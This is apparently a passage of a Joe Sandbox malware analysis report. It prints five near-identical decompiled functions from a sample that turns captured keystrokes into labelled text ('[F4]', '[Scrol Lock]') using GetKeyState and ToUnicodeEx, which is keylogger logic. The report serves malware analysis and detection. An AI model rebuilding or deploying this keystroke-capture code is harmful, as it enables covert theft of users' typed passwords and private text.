ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Media], xrefs: 00C85C7C
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B9D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B9D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F23]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b9d
0x00c85ba4
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F23], xrefs: 00C85B9F

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D92, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D92(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Scrol Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d92
0x00c85d99
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Scrol Lock], xrefs: 00C85D94

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B37, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B37(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F18]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b37
0x00c85b3e
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[F18], xrefs: 00C85B39
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85BD0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BD0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F4]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85bd0
0x00c85bd7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F4], xrefs: 00C85BD2

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C03, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C03(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F7]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c03
0x00c85c0a
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F7], xrefs: 00C85C05
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

